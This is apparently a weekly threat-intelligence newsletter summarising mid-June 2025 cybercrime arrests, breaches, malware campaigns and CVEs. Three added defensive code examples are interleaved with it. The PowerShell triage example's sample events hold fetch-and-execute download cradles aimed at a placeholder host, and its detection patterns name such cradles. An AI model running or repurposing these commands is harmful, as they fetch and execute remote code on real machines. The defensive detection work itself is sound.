VerSprite Weekly Threat Intelligence
Date Range: 16 June 2025 – 20 June 2025
Issue: 19th Edition
Security Triumphs of the Week
This week saw significant cybersecurity victories through global collaboration: Operation Deep Sentinel dismantled the Archetyp darknet market, arresting its administrator and seizing €7.8 million, while U.S. agencies recovered $225 million in crypto linked to scams. Ukraine extradited a ransomware suspect tied to $100+ million in extortion, and Thai authorities disrupted a hybrid ransomware-gambling operation. Apple patched a zero-click spyware flaw exploited against journalists, and a $5.48 million settlement addressed HealthEC’s breach of 4.6 million records. These efforts highlight law enforcement’s growing capacity to counter cross-border cybercrime, hybrid threats, and sophisticated financial laundering.
- Operation Deep Sentinel: Authorities Shut Down Darknet Market Archetyp
Operation Deep Sentinel led to the takedown of Archetyp Market, a major darknet platform facilitating illegal drug sales and transactions via Monero. Authorities arrested its German administrator in Spain, alongside raids in Germany, Romania, Sweden, and the Netherlands, seizing devices, €7.8 million in assets, and disabling critical servers. The marketplace had 612,000 users, 3,200 vendors, and €250 million in turnover. International collaboration highlighted law enforcement’s growing ability to disrupt sophisticated darknet operations. The operation underscores ongoing efforts to combat cybercrime and illicit online markets.
Read full article: Gbhackers
- US Recovers $225 Million of Crypto Stolen in Investment Scams
The U.S. Department of Justice, alongside the FBI, Secret Service, and private firms Tether and TRM Labs, recovered $225 million in cryptocurrency stolen through investment scams, marking the largest crypto seizure in U.S. Secret Service history. The funds, linked to over 400 victims, were laundered via a complex network of crypto addresses to obscure their origin. Blockchain analysis revealed the fraudsters used 93 scam deposit addresses, 35 intermediary wallets, and consolidated funds into seven USDT wallet groups. One victim, a bank CEO, lost $47.1 million after being tricked into fraudulent crypto investments. Tether froze and reissued the stolen USDT to enable government recovery under federal forfeiture laws. The operation highlights advanced laundering tactics, including coordinated fake KYC documents and excessive gas fees to hinder tracing. Authorities aim to identify victims for restitution but have not yet detailed this phase.
Read full article: Bleepingcomputer
- Ukraine Extradites Suspected Ransomware Group Member to US
Ukraine extradited a 33-year-old foreign national to the U.S. for alleged involvement in a ransomware group linked to Ryuk and other strains. The suspect, arrested in Kyiv in April 2024, specialized in breaching corporate networks, enabling ransomware attacks on over 2,400 organizations across 70+ countries, extorting $100+ million. The operation involved international collaboration, including Europol and U.S. agencies, following seizures in 2023 that identified the suspect. The group, previously tied to Conti and TrickBot, disbanded in 2022 after supporting Russia’s invasion of Ukraine. Ukrainian authorities also seized crypto assets, luxury cars, and land during the investigation, building on prior arrests in 2021 and 2023.
Read full article: Bankinfosec
- Ransomware Gang Busted by Authorities; Devices and Evidence Seized
Thai authorities raided the Antai Holiday Hotel in Pattaya, dismantling a dual criminal operation involving a gambling den and a ransomware cybercrime ring. The June 16 operation uncovered gambling activities on the second floor and a ransomware hub on the eighth floor, where six Chinese nationals targeted Chinese companies. Authorities seized nine laptops, 15 mobile devices, and arrested 20 foreigners, primarily Chinese nationals, for cybercrime, illegal gambling, and immigration violations. The raid underscores the convergence of cybercrime (ransomware, identity theft) and traditional organized crime (gambling, money laundering). Suspects face deportation and entry bans if convicted. The incident highlights evolving criminal tactics and law enforcement challenges in addressing hybrid digital-physical threats. Investigations continue to uncover the gang’s full operations.
Read full article: Gbhackers
- Apple Fixes Zero-Click Exploit Underpinning Paragon Spyware Attacks
Apple addressed a zero-click vulnerability (CVE-2025-43200) in iOS/iPadOS 18.3.1, exploited via malicious iCloud Links to deploy Paragon’s Graphite spyware. Two Italian journalists from Fanpage.it were targeted between January and February 2024, confirmed by Citizen Lab, which linked the attacks to a single group. The spyware operated covertly in memory, evading detection. Italy terminated its contract with Paragon after a parliamentary report revealed seven Graphite victims, including activists. Apple and WhatsApp issued alerts to targeted users globally. Experts recommend enabling Lockdown Mode and updating devices to mitigate such sophisticated spyware threats.
Read full article: Theregister
Security Setbacks of the Week
The past week saw widespread cyberattacks targeting diverse sectors, with ransomware (Krispy Kreme, Freedman HealthCare), data breaches (Zoomcar, 23andMe), and state-aligned espionage (Washington Post, Paragon spyware) compromising millions of records and disrupting operations. Emerging threats included weaponized infostealer datasets (16 billion credentials) and sophisticated scams exploiting search ads and Instagram deepfakes. Critical infrastructure vulnerabilities were highlighted by WestJet’s service disruptions and healthcare data extortion attempts. Persistent issues like weak authentication (23andMe), insider negligence (FCA), and delayed breach responses amplified risks, underscoring the urgent need for enhanced security protocols, multi-factor adoption, and proactive threat monitoring across industries.
- Krispy Kreme Data Breach Exposes Customer Personal Information
Krispy Kreme suffered a ransomware attack in late 2024, compromising personal data of over 160,000 individuals, primarily employees and customers. The Play ransomware group stole 184 GB of sensitive data, including Social Security numbers, financial details, and medical information, later leaking it after the company refused to pay the ransom. Breach impacts spanned employee records, customer data, and operational disruptions, particularly in online systems. Krispy Kreme engaged cybersecurity experts, notified affected individuals, and offered credit monitoring services. Costs exceeded $11 million, with further expenses anticipated for enhanced security measures.
Read full article: Gbhackers
- Zoomcar Data Breach Exposes Sensitive Details of 8.4 Million Users
Zoomcar Holdings confirmed a data breach affecting 8.4 million users, detected on June 9, 2025, and disclosed via an SEC filing. Compromised data includes names, phone numbers, addresses, email addresses, and car registration details, though financial data and passwords were reportedly unaffected. The breach stemmed from unauthorized access by an external threat actor, prompting Zoomcar to activate incident response protocols, enhance network safeguards, and engage cybersecurity experts. Authorities were notified, with no operational disruptions reported. Users face risks of phishing and identity theft, prompting advisories to monitor accounts and remain vigilant. The incident highlights escalating cyber threats to consumer platforms and potential legal, financial, and reputational repercussions for Zoomcar.
Read full article: Gbhackers
- 23andMe Hit with £2.3M Fine After Exposing Genetic Data of Millions
The UK’s Information Commissioner’s Office fined 23andMe £2.3 million for a 2023 breach exposing genetic and personal data of 6.9 million users. Attackers used credential stuffing to access 14,000 accounts, exploiting weak security measures like absent multi-factor authentication and inadequate threat detection. A five-month delay in addressing the breach amplified the impact, as compromised accounts via the DNA Relatives feature exposed millions more. The fine was reduced from an initial £4.59 million after negotiations. 23andMe, now in Chapter 11 bankruptcy, faces challenges paying the penalty but claims improved security measures. The breach highlighted systemic failures in protecting sensitive data, prompting a joint UK-Canada regulatory investigation.
Read full article: Theregister
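The 23andMe item above turns on credential stuffing that went undetected for months. The following is an added example (not from the newsletter, and not 23andMe's tooling) of the kind of check a defender can run over authentication logs to surface it: one source address cycling through many distinct accounts with a high failure rate. The log format, thresholds and sample lines are all constructed for the example.

```python
"""Credential-stuffing detector over authentication log lines.

Added example. Assumed (constructed) log format, one event per line:
    <ISO-8601 timestamp> <client_ip> <username> <SUCCESS|FAIL>
Thresholds (window, min_accounts, min_fail_ratio) are assumptions to tune.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.5 sprays six different accounts in seconds,
# mostly failing, with one success (the stuffing signature). 198.51.100.7 is a
# single user who mistyped a password once and then logged in normally.
SAMPLE_LOG = """\
2023-10-01T10:00:00 203.0.113.5 alice FAIL
2023-10-01T10:00:01 203.0.113.5 bob FAIL
2023-10-01T10:00:02 203.0.113.5 carol FAIL
2023-10-01T10:00:03 203.0.113.5 dave SUCCESS
2023-10-01T10:00:04 203.0.113.5 erin FAIL
2023-10-01T10:00:05 203.0.113.5 frank FAIL
2023-10-01T10:05:00 198.51.100.7 alice FAIL
2023-10-01T10:05:10 198.51.100.7 alice SUCCESS
"""


def parse_line(line):
    """Split one log line into (timestamp, ip, username, outcome)."""
    ts, ip, user, outcome = line.split()
    return datetime.fromisoformat(ts), ip, user, outcome


def find_stuffing_sources(log_text, window=timedelta(minutes=5),
                          min_accounts=5, min_fail_ratio=0.6):
    """Return {ip: summary} for every source IP that, inside any `window`,
    attempted at least `min_accounts` distinct usernames with a failure
    ratio of at least `min_fail_ratio`. The summary names the accounts that
    did succeed, since those are the ones to lock and notify first."""
    events = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, ip, user, outcome = parse_line(line)
        events[ip].append((ts, user, outcome))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        best, start = None, 0
        for end in range(len(evs)):            # sliding time window
            while evs[end][0] - evs[start][0] > window:
                start += 1
            chunk = evs[start:end + 1]
            users = {u for _, u, _ in chunk}
            fails = sum(1 for _, _, o in chunk if o == "FAIL")
            ok = len(users) >= min_accounts and fails / len(chunk) >= min_fail_ratio
            if ok and (best is None or len(users) > best["distinct_accounts"]):
                best = {
                    "distinct_accounts": len(users),
                    "attempts": len(chunk),
                    "failures": fails,
                    "compromised": sorted(u for _, u, o in chunk if o == "SUCCESS"),
                }
        if best:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, summary in find_stuffing_sources(SAMPLE_LOG).items():
        print(ip, summary)
```

The window-based approach matters because a patient attacker can keep the per-minute rate low; widening `window` trades detection latency for sensitivity. Pairing this with multi-factor authentication, which the item identifies as absent, removes most of the value of a successful guess in the first place.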
- Canadian Airline WestJet Suffers Cyberattack, Halts App and Web Services
WestJet, Canada’s second-largest airline, experienced a cyberattack on June 13, disrupting its mobile app, website, and internal systems. The incident caused intermittent outages for customers, though flight operations remained unaffected and secure. The airline activated specialized teams, collaborating with law enforcement and Transport Canada to investigate and mitigate impacts. No confirmed data breaches or ransom demands have been disclosed yet. WestJet advised customers and staff to remain vigilant against potential phishing attempts. The attack reflects a broader trend of cyber threats targeting Canadian critical infrastructure. Regular updates are being provided as the company works to restore services and ensure transparency.
Read full article: Gbhackers
- Billions of Logins for Apple, Google, Facebook, Telegram, and More Found Exposed Online
Cybernews researchers uncovered 30 exposed datasets totaling 16 billion login credentials for major platforms like Apple, Google, Facebook, and Telegram, linked to infostealer malware. These fresh, weaponizable datasets—not recycled breaches—were briefly exposed, leaving credentials in criminal hands. Risks include account takeovers, identity theft, targeted phishing, and ransomware attacks. Infostealers harvest data from browsers, apps, and crypto wallets, emphasizing the need for updated anti-malware tools, unique passwords via managers, and phishing-resistant 2FA (e.g., FIDO2 keys). The scale highlights infostealers’ effectiveness, urging proactive protection and monitoring of exposed personal data.
Read full article: Malwarebytes
- Hackers Target and Hijack Washington Post Journalists’ Email Accounts
A targeted cyberattack compromised several Washington Post journalists’ email accounts, discovered on June 12, prompting a system-wide password reset and forensic investigation. The breach primarily affected reporters covering national security, economic policy, and China-related topics, suggesting potential state-sponsored involvement. While no customer data or other systems were impacted, the incident mirrors past attacks on media outlets like News Corp in 2022. Experts highlight journalists’ vulnerability to cyber espionage due to their access to sensitive information. The attack underscores escalating digital threats to press freedom, risking both confidential sources and journalistic integrity.
Read full article: Gbhackers
- Paragon Commercial Spyware Infects Prominent Journalists
The Citizen Lab identified that Paragon Solutions’ Graphite spyware targeted two European journalists via a zero-click iOS exploit (CVE-2025-24200), patched by Apple in February. Forensic analysis linked both attacks to a single Paragon operator, using servers and a shared iMessage account. One victim, an anonymous journalist, was compromised in January and February, while Italian journalist Ciro Pellegrino and another editor at Fanpage.it were also affected. Evidence suggests the Italian government used Graphite against activists, per a parliamentary report. Paragon, acquired by AE Industrial Partners, faces ongoing scrutiny for enabling surveillance of dissidents and journalists, reflecting broader risks of commercial spyware misuse.
Read full article: Darkreading
- Remorseless Extortionists Claim to Have Stolen Thousands of Files from Freedman HealthCare
An extortion group, World Leaks (formerly Hunters International), claims to have stolen 52.4 GB of sensitive data from Freedman HealthCare, a firm managing healthcare databases for state agencies and insurers. They threatened to leak 42,204 files, potentially exposing insurance, claims, and payment data of millions. Freedman’s CEO disputed the severity, stating a prior April incident only affected a single server, with no protected health information compromised. Independent analysis of the leaked data revealed management accounts, passwords, and contracts but no personal data. World Leaks has a history of high-profile attacks. The breach underscores risks to critical healthcare infrastructure despite the disputed impact.
Read full article: Theregister
- Scammers Hijack Websites of Bank of America, Netflix, Microsoft, and More to Insert Fake Phone Number
Scammers are exploiting search parameter injection attacks to hijack legitimate websites of major brands like Bank of America, Netflix, Microsoft, and PayPal. By purchasing sponsored Google ads posing as these brands, attackers redirect users to genuine support pages but inject fake phone numbers into search results. The URLs remain legitimate, masking the fraud, and victims are tricked into contacting scammers who steal financial data or gain remote access. This vulnerability arises from insufficient input sanitization in search functionalities, as seen with Netflix. Malwarebytes Browser Guard detects such hijacking, warning users of altered results.
Read full article: Malwarebytes
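The search parameter injection item above comes down to a site reflecting an unchecked query string back into its own page, where an injected phone number reads as official guidance. As an added example (not from the newsletter, Malwarebytes, or any of the named sites), the block below contrasts a reflection function that echoes the raw parameter with one that strips phone-number and URL patterns, clamps the length, and HTML-escapes before rendering. The crafted query, the regular expressions and the length limit are constructed assumptions.

```python
"""Hardening the reflection of a user-supplied search term.

Added example. The query, phone/URL patterns and MAX_LEN are assumptions;
the fake number uses the 555-01xx range reserved for fiction.
"""
import html
import re

# Constructed example of a crafted search parameter: support-style wording
# that carries a phone number and some markup.
CRAFTED_QUERY = "Account locked? Call Support Now +1 (800) 555-0199 <b>immediately</b>"

# A run of 8+ digits with optional +, spaces, dots, dashes and parentheses.
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{6,}\d")
URL_RE = re.compile(r"(?:https?://|www\.)\S+", re.I)
MAX_LEN = 40  # long enough for a real search term, too short for a script


def render_results_vulnerable(query):
    """Echoes the raw parameter: the pattern the item describes as exploited."""
    return f"<p>No results found for {query}</p>"


def sanitize_search_term(query):
    """Remove phone numbers and URLs, collapse whitespace, clamp length,
    then HTML-escape so the term can only ever be rendered as text."""
    cleaned = PHONE_RE.sub("", query)
    cleaned = URL_RE.sub("", cleaned)
    cleaned = re.sub(r"\s+", " ", cleaned).strip()[:MAX_LEN]
    return html.escape(cleaned, quote=True)


def render_results_hardened(query):
    """Reflects the sanitized term, visibly quoted so it reads as the user's
    own input rather than as a message from the site."""
    term = sanitize_search_term(query)
    return f"<p>No results found for &ldquo;{term}&rdquo;</p>"


if __name__ == "__main__":
    print(render_results_vulnerable(CRAFTED_QUERY))
    print(render_results_hardened(CRAFTED_QUERY))
```

Stripping digit runs also removes legitimate order or account numbers from the reflected text (the search itself can still use them), which is usually an acceptable trade for a public support search. The visible quoting is as important as the filtering: the phone-number scam works precisely because the reflected text is indistinguishable from the site's own copy.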
- Fake Bank Ads on Instagram Scam Victims Out of Money
Fake Instagram ads impersonating major banks like BMO and EQ Bank are scamming users through deepfake videos and typosquatted domains. These fraudulent ads mimic legitimate branding, offering unrealistic returns or fake investment groups via WhatsApp to steal login credentials or funds. Scammers exploit urgency and authority, such as impersonating bank executives, to pressure victims into sharing sensitive information. Tactics include redirecting users to fake login pages or malicious sites after clicking ads. Recommendations to avoid scams include verifying ads through official channels, enabling multi-factor authentication, and scrutinizing suspicious visuals or language. The scams highlight risks across social platforms like Instagram, X, and WhatsApp.
Read full article: Malwarebytes
- Slapped Wrists for Financial Conduct Authority Staff Who Emailed Work Data Home
Four UK Financial Conduct Authority (FCA) staff received warnings for emailing work data to personal accounts during 2022/23, with three receiving first written warnings and one already on a final warning. The FCA, responsible for regulating financial data breaches, did not disclose specifics of the data involved. A potential fifth incident was withheld under FoI exemptions to protect identities. Experts criticized the breaches as reckless, urging stronger data protection measures amid rising cyber risks. The FCA acknowledged no similar incidents in 2023/24 or 2024/25. This follows past FCA data leaks, including a 2020 FoI response exposing 1,600 complainants’ details, mirroring breaches in other UK public sector bodies.
Read full article: Theregister
- Armored Cash Transport Trucks Allegedly Hauled Money for $190 Million Cryptolaundering Scheme
Australian authorities charged four individuals in a $190 million crypto-laundering scheme using a security firm’s armored trucks to mix illicit funds with legitimate cash, funneled through third-party businesses and crypto exchanges. The same article also covered unrelated regional developments: APNIC restructured its organization to eliminate silos, forming new teams to align with strategic goals and aiming to resolve budget deficits by 2027. India reduced minimum size requirements for special economic zones, enabling Micron’s semiconductor plant and boosting chipmaking investments. Cambodia banned Thai internet connections amid cross-border scam camp tensions, causing local outages. AWS pledged $13 billion to expand Australian data centers, focusing on AI and cloud services. Other developments included China’s AI satellite initiatives, Infosys’ resolved tax probe, and Qualcomm’s Vietnam AI research center.
Read full article: Theregister
The New Emerging Threats
Emerging cyber threats showcase escalating sophistication, with ransomware groups like Qilin and Anubis employing advanced encryption, double extortion, and irreversible data destruction across healthcare, finance, and critical infrastructure. North Korean actors (BlueNoroff, Famous Chollima, KimJongRAT) leverage AI deepfakes, macOS malware, and social engineering to target crypto and blockchain sectors, while Android banking trojans like Godfather weaponize legitimate apps for real-time data theft. APT campaigns in East Asia and Europe exploit phishing, zero-days, and cloud infrastructure, alongside fileless malware and deceptive travel platforms distributing RATs. Social engineering remains pervasive, with groups like Scattered Spider bypassing MFA via help desk impersonation, underscoring the need for enhanced endpoint security, behavioral monitoring, and proactive vulnerability management.
- Qilin Ransomware Rises as Major Threat, Demanding $50M in Ransom
The Qilin ransomware group, rebranded from Agenda in 2023, has emerged as a top cyber threat, demanding ransoms up to $50 million. Operating a Ransomware-as-a-Service (RaaS) model, Qilin recruits affiliates through Russian forums, offering 85% revenue shares. Its malware, rewritten in Rust, targets Windows, Linux, and VMware systems with advanced encryption, anti-forensics, and double extortion tactics. Notable attacks include disrupting the UK’s NHS via Synnovis Group, causing widespread healthcare delays. Qilin opportunistically exploits vulnerabilities across sectors like healthcare, finance, and manufacturing, avoiding CIS countries. Security experts urge proactive defenses, including patching and phishing mitigation, to counter its evolving threats.
Read full article: Gbhackers
- North Korean Hackers Deepfake Execs in Zoom Call to Spread Mac Malware
North Korean hacking group BlueNoroff (aka Sapphire Sleet) used AI-generated deepfakes of company executives in Zoom calls to distribute macOS malware targeting cryptocurrency theft. Posing as professionals via Telegram, attackers lured a tech firm employee into a fake Zoom meeting, where deepfaked participants prompted the victim to download a malicious AppleScript disguised as a Zoom fix. The script deployed multiple payloads, including backdoors, surveillance tools, and crypto stealers like Root Troy V4 and CryptoBot. Researchers identified sophisticated tactics, including disabling security logs and leveraging legitimate certificates to evade detection. This campaign highlights BlueNoroff’s evolving use of social engineering and macOS-focused malware, underscoring rising threats to Apple devices in enterprise environments. Huntress warns organizations to enhance Mac security amid increasing APT targeting.
Read full article: Bleepingcomputer
- Godfather Malware Turns Real Banking Apps Into Spy Tools
The Godfather Android banking Trojan has evolved to weaponize legitimate financial apps by cloning them within a virtual environment on infected devices, enabling real-time data theft. This new variant uses frameworks like VirtualApp to create a sandboxed space where genuine banking and crypto apps run under attacker control, bypassing traditional overlay tactics. By leveraging Android Accessibility Services and network interception, the malware captures login credentials, 2FA codes, and transaction details while manipulating app-server communications. It also enables remote device control, suppressing detection indicators. Targeting 500+ apps globally, including 12 Turkish banks, the campaign represents a significant escalation in mobile threats, combining stealth with operational sophistication.
Read full article: Bankinfosec
- Chollima Hackers Target Windows and MacOS with New GolangGhost RAT Malware
A North Korean-linked threat actor, Famous Chollima, deployed new Python (PylangGhost) and Golang (GolangGhost) RAT variants targeting Windows and macOS users, particularly cryptocurrency and blockchain professionals. The group uses fake job platforms mimicking companies like Coinbase to lure victims into executing malicious commands disguised as camera driver installations. Windows infections involve PowerShell-driven ZIP file extraction, while macOS uses Bash scripts. The malware steals credentials from browsers, wallets (e.g., MetaMask), and password managers, enabling remote system control. Cisco Talos reports limited impact, mainly in India, and provides detection tools. Organizations in crypto sectors are advised to enhance vigilance against such social engineering attacks.
Read full article: Bankinfosec
- New KimJongRAT Stealer Uses Weaponized LNK File to Deploy PowerShell-Based Dropper
Two new KimJongRAT stealer variants employ weaponized LNK files to initiate multi-stage attacks, deploying PowerShell or PE-based droppers. The malware masquerades as legitimate documents, luring victims to trigger malicious scripts that download HTA files from attacker-controlled CDNs. The PowerShell variant drops decoy PDFs while extracting ZIP archives containing scripts to decode and execute stealers targeting crypto wallets (MetaMask, Trust Wallet) and browser credentials. The PE variant uses DLL loaders for broader theft, including FTP and email data. Both variants leverage encrypted communications (XOR/RC4) and CDN-hosted payloads to evade detection. Palo Alto Networks highlights defenses via Advanced WildFire and Cortex XDR, noting KimJongRAT’s continued evolution since 2013.
Read full article: Gbhackers
- Hackers Use Fake Verification Prompt and Clickfix Technique to Deploy Fileless AsyncRAT
A new campaign distributes a fileless AsyncRAT variant via fake verification prompts targeting German-speaking users. Attackers trick victims into copying malicious commands, leveraging obfuscated PowerShell scripts and in-memory execution to avoid file-based detection. The payload connects to C2 servers, establishes persistence via registry keys, and enables remote control, credential theft, and data exfiltration. Techniques include hidden PowerShell instances, reversed C# code compilation, and non-standard port communication (4444). Mitigations involve blocking suspicious PowerShell, monitoring registry changes, enforcing network segmentation, and enabling memory scanning. The campaign highlights evolving fileless malware tactics to bypass traditional defenses.
Read full article: Gbhackers
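The AsyncRAT item above lists the traits that make a ClickFix launch stand out in process telemetry: a hidden PowerShell window, encoded or in-memory script, persistence in the registry, and a non-standard port. The block below is an added example (not from the newsletter and not a vendor's rule) of scoring PowerShell process-creation events on those traits, including decoding a `-EncodedCommand` payload so that a cradle hidden in base64 is still seen. The event format, the sample events, the indicator weights and the alert threshold are all constructed assumptions.

```python
"""Triage of PowerShell process-creation events for ClickFix-style launches.

Added example. Event format (parent image + command line) is a constructed
simplification of endpoint process telemetry; indicator weights and the
threshold are assumptions to tune. Sample events are constructed, not real.
"""
import base64
import re


def encoded_command(script):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text (sample helper)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


SAMPLE_EVENTS = [
    {   # ClickFix pattern: pasted into the Run box, so explorer.exe is the parent
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc "
                   + encoded_command("IEX (New-Object Net.WebClient)"
                                     ".DownloadString('http://example.invalid/a')"),
    },
    {   # benign maintenance script run by an installed agent
        "parent": r"C:\Program Files\Example\updater.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ProgramData\Example\update.ps1",
    },
    {   # plain-text download cradle launched from a shell
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": 'powershell -w hidden -c "IEX (New-Object Net.WebClient)'
                   '.DownloadString(\'http://example.invalid/b\')"',
    },
]

# (name, pattern, weight); weights are assumptions.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("no_profile",      re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("policy_bypass",   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 1),
    ("download_cradle", re.compile(r"\biex\b|invoke-expression|downloadstring|downloadfile"
                                   r"|invoke-webrequest|\biwr\b", re.I), 3),
    ("port_4444",       re.compile(r":4444\b"), 2),                       # port named in the item
    ("run_key",         re.compile(r"currentversion\\run\b", re.I), 2),   # registry persistence
]
ALERT_THRESHOLD = 5
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or '' if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:          # binascii.Error is a ValueError subclass
        return ""


def score_event(event):
    """Return (score, [indicator names]); indicators are matched against the
    raw command line plus the decoded encoded command, so base64 hides nothing."""
    text = event["cmdline"] + "\n" + decode_encoded_command(event["cmdline"])
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            score += weight
    if event["parent"].lower().endswith("\\explorer.exe"):
        hits.append("launched_from_explorer")   # Run-box launch, typical of ClickFix
        score += 2
    return score, hits


def triage(events, threshold=ALERT_THRESHOLD):
    """Indices of events whose score reaches the alert threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]


if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, score_event(SAMPLE_EVENTS[i]))
```

Weighted scoring rather than a single pattern keeps the benign `-File` maintenance script below the threshold while still alerting on both the encoded and the plain-text cradle. In a real deployment the registry and port indicators would come from separate registry-set and network-connection events correlated by process id; here they are matched on the command line only to keep the example self-contained.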
- Scattered Spider Targeting American Insurance Firms
Scattered Spider, a financially motivated hacking group primarily composed of English-speaking adolescents, has shifted focus to target U.S. insurance firms through social engineering tactics, including impersonating help desk staff to bypass multi-factor authentication. Google’s Threat Intelligence Group warned of multiple intrusions linked to the group, which previously attacked British retailers and over 130 companies, including MGM Resorts and Clorox. Recent incidents include network outages at Philadelphia Insurance and Erie Insurance following unauthorized access. The group’s affiliate model enables resilience against law enforcement, with its rise partly attributed to crackdowns on Russian-speaking cybercrime syndicates. Experts recommend bolstering identity verification, hardening service desk processes, and monitoring behavioral anomalies to mitigate risks.
Read full article: Bankinfosec
- Threat Actors Deploy XWorm Malware via Fake Travel Websites to Infect Users’ PCs
A sophisticated malware campaign targeting vacation planners through fake Booking.com travel websites was uncovered by HP Threat Research in Q1 2025. Attackers exploit “click fatigue” with counterfeit GDPR cookie banners, tricking users into downloading malicious JavaScript that initiates XWorm RAT deployment. The multi-stage attack uses PowerShell scripts and a .NET binary to inject XWorm into legitimate processes like MSBuild.exe, evading detection via process hollowing. Campaigns also employed unusual file formats (.mslibrary, .svg) to distribute DCRat and AsyncRat through email and WebDAV. This reflects a broader surge in malware targeting travel platforms, leveraging social engineering and trusted services to bypass defenses. HP emphasizes the need for advanced endpoint security and user vigilance against deceptive prompts.
Read full article: Gbhackers
- Anubis Ransomware Introduces Irreversible File Destruction Feature
Anubis, a Ransomware-as-a-Service (RaaS) operation active since December 2024, combines file encryption with irreversible file destruction via its “wipe mode,” permanently deleting data even if ransoms are paid. Targeting sectors like healthcare and engineering across multiple countries, it employs spear-phishing, command-line execution, and privilege escalation to deploy its payload. The ransomware uses ECIES encryption, appends “.anubis” to files, deletes Volume Shadow Copies, and disrupts critical services to hinder recovery. Its affiliate program, advertised on cybercrime forums, supports double extortion by threatening data leaks. Anubis’s evolution from the Sphinx prototype highlights its growing sophistication, urging organizations to adopt offline backups, strict access controls, and enhanced phishing defenses to mitigate risks.
Read full article: Gbhackers
- Kimsuky and Konni APT Groups Lead Active Attacks Targeting East Asia
In April 2025, APT groups Kimsuky and Konni led targeted attacks in East Asia, focusing on government, financial, and research sectors via spear phishing (70% of incidents), using tailored lures like trilateral cooperation themes. Sidewinder targeted South Asian governments, while APT29 (Cozy Bear) attacked European diplomats with GRAPELOADER and WINELOADER. North Korea’s Lazarus exploited vulnerabilities in South Korean software (Cross EX, Innorix) through the “SyncHole” operation, deploying watering hole attacks and trojans like ThreatNeedle. These campaigns highlight escalating APT sophistication, blending social engineering and technical exploits, stressing the need for enhanced cybersecurity measures globally.
Read full article: Gbhackers
- Serpentine#Cloud Uses Cloudflare Tunnels in Sneak Attacks
The Serpentine#Cloud campaign employs Cloudflare Tunnels and obfuscated Python loaders to deliver memory-injected malware via phishing emails containing malicious .lnk files. Attackers use zipped attachments disguised as documents to initiate a chain of scripts, evading detection by leveraging Cloudflare’s trusted infrastructure for payload delivery. Targets include organizations in the US, UK, Germany, Europe, and Asia. The attack deploys decoy PDFs, checks for antivirus software, and establishes persistence via startup folders, culminating in a backdoored system. While sophisticated, the campaign’s use of open-source tools and coding inconsistencies suggests it may not align with major nation-state actors. Securonix highlights the campaign’s stealthy blend of social engineering and living-off-the-land techniques, urging vigilance against phishing and enhanced endpoint monitoring.
Read full article: Darkreading
- ‘HoldingHands’ Acts Like a Pickpocket with Taiwan Orgs
A sophisticated cyber campaign targets Taiwanese organizations via phishing emails impersonating government entities like the National Taxation Bureau. Attackers deliver malicious ZIP files containing multistage payloads, including the HoldingHands RAT (Gh0stBins), which exfiltrates data and enables surveillance. The infection chain uses shellcode, loaders, and encrypted configurations to evade detection, harvesting system data, user information, and registry values. The threat actor employs multiple malware variants (Winos 4.0, Gh0stCringe) in coordinated waves, suggesting state-backed, well-resourced operations. This aligns with broader trends of China-linked groups intensifying attacks on Taiwan’s government and telecom sectors. Experts emphasize the need for real-time behavioral analysis to counter evolving tactics.
Read full article: Darkreading
Vulnerability Spotlight: Critical Exposures Unveiled
Critical vulnerabilities across diverse systems—including SD-WAN platforms, CMS, backup software, and Linux modules—highlight systemic security gaps enabling RCE, privilege escalation, and authentication bypass. High-severity flaws (CVSS 7.2–9.9) in products like Versa Director, Veeam Backup, and Sitecore CMS expose organizations to supply chain attacks, botnet conscription, and data theft. Exploitation risks escalate with public PoCs, coordinated attacks (e.g., Zyxel firewalls targeted via Mirai-linked payloads), and default credential retention. While patches exist for most vulnerabilities, delayed updates and misconfigurations (e.g., exposed UDP ports, unvalidated endpoints) leave networks vulnerable. Proactive patching, access control hardening, and monitoring for post-exploitation activity are critical to mitigate cascading threats.
- CVE-2025-23171 & CVE-2025-23172: Versa Director Bugs Open Doors to Webshell Uploads and Command Execution
Two critical vulnerabilities (CVE-2025-23171 and CVE-2025-23172) in Versa Director’s SD-WAN platform allow authenticated attackers to execute remote code or escalate privileges. CVE-2025-23171 exploits insecure file uploads, bypassing UI restrictions to deploy webshells, while CVE-2025-23172 abuses webhook functions to execute commands as a sudo-privileged user. Both carry a CVSS score of 7.2 and affect multiple versions, with patches released for specific builds starting February and June 2025. Though no active exploitation is reported, public PoC code increases the risk of attacks. Organizations are urged to apply updates, as unpatched systems remain vulnerable to RCE and system takeover.
Read full article: Securityonline
- Cisco ClamAV Critical Flaws: CVE-2025-20260 (CVSS 9.8) Allows Code Execution
Cisco’s ClamAV addressed two critical vulnerabilities: CVE-2025-20260 (CVSS 9.8) and CVE-2025-20234 (CVSS 5.3). The first, a buffer overflow in PDF scanning under configurations with large file/scan size limits, risks denial-of-service (DoS) or remote code execution (RCE). The second, a memory overread in UDF file processing, could trigger DoS. Both flaws affect enterprise environments using high-throughput scanning. Patched versions 1.4.3 and 1.0.9 resolve these issues. Organizations are urged to update immediately, especially if custom scan thresholds are enabled.
Read full article: Securityonline
